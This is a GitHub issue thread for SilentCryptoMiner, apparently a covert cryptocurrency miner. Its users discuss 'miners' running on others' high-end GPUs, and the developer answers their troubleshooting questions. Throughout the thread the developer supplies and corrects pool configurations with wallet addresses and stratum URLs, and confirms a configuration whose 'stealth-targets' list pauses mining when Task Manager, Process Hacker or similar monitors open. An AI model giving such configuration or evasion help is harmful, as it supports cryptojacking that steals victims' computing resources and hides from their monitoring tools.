### ISSUE TITLE
Problems with ETH / ETC Configuration

### ISSUE THREAD

**Issue by Pooo0ky** [UnamSanctam/SilentCryptoMiner#90]
Hi Unam , i don't know why in these day i'm getting only ETC miners that have a really good GPU , like 2060 , 3070 and 3060 ti and in the miner i have first the eth miner and then the Etc miner and i don't undesteand why they are going on the ETC pool.
![image](https://user-images.githubusercontent.com/91561706/143057501-0458b5f7-267e-4bad-a586-27bfc7cc7223.png)

![image](https://user-images.githubusercontent.com/91561706/143057319-cae744dd-c2f4-454d-b3fd-3ef9c61a702a.png)

I don't know why they are not mining ETH. The config it's correct and it's the same i'm using from the release.

**Comment by UnamSanctam** [comment]
Because both miners are running at once meaning they are fighting for the VRAM, since ETC requires less it takes less time for it to allocate the VRAM and thus might win. It's always better to just include one miner (for example ETC) in the builder and then just change it in the web panel to ETH on good GPUs.

**Comment by Pooo0ky** [comment]
So in that case if the remote configuration with eth will fail they will mine etc with the original configuration?
Thank you

**Comment by Brainshot** [comment]
> Because both miners are running at once meaning they are fighting for the VRAM, since ETC requires less it takes less time for it to allocate the VRAM and thus might win. It's always better to just include one miner (for example ETC) in the builder and then just change it in the web panel to ETH on good GPUs.

Hey unam so since i have some good gpus mining ETC how can i switch them to ethereum classic? since both are etcash algorithm

what would the json code be?

**Comment by Brainshot** [comment]
@UnamSanctam 

{
"algo": "ethash",
"pool": "eth-eu2.nanopool.org",
"port": 9999,
"wallet": "Wallet",
"rig-id": "Worker",
"ssltls": false
}

**Comment by UnamSanctam** [comment]
ETC is Ethereum Classic, do you mean ETH? What you posted is the XMRig configuration and not the ethminer configuration.
To mine ETC you would just do something like:
```
{
    "url": "stratum://0xe8D349AC6087d114B1EF41a2E51aa442a3EA50F6.Worker@etc-eu2.nanopool.org:19999",
    "algo": "etchash"
}
```
https://github.com/UnamSanctam/SilentCryptoMiner/wiki/ETH-Miner#advanced

**Comment by UnamSanctam** [comment]
Oh you edited it, for ETH it would be:
{
    "url": "stratum://0xe8D349AC6087d114B1EF41a2E51aa442a3EA50F6.Worker@eth-eu1.nanopool.org:9999",
    "algo": "ethash"
}

**Comment by Brainshot** [comment]
> 

Thanks alot!

**Comment by UnamSanctam** [comment]
It's quite hard to add which is why I haven't done so yet.

**Comment by 1aminov** [comment]
@UnamSanctam in what format to add config to webpanel?

**Comment by UnamSanctam** [comment]
Same as the "Remote Configuration".

**Comment by 1aminov** [comment]
@UnamSanctam {
"url": "stratum://0xCfF7Fda52C46D6863777778FE22945e41A9f8A96C.Worker@etc-eu1-etc.ethermine.org:5555",
"algo": "etchash",
"max-gpu": 50,
"idle-wait": 1,
"idle-gpu": 90,
"stealth": true,
"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe"
} 

right?

**Comment by UnamSanctam** [comment]
Should be `stratums://0xCfF7Fda52C46D6863777778FE22945e41A9f8A96C.Worker@etc-eu1-etc.ethermine.org:5555` since you use the SSL port but other than that it should work. You also don't need `"stealth": true,` since having "stealth-targets" will enable it automatically.

**Comment by 1aminov** [comment]
@UnamSanctam that is, I can leave startum and not change it to stratums if I use ssl port?

**Comment by UnamSanctam** [comment]
Change it to stratums since you use the SSL port.
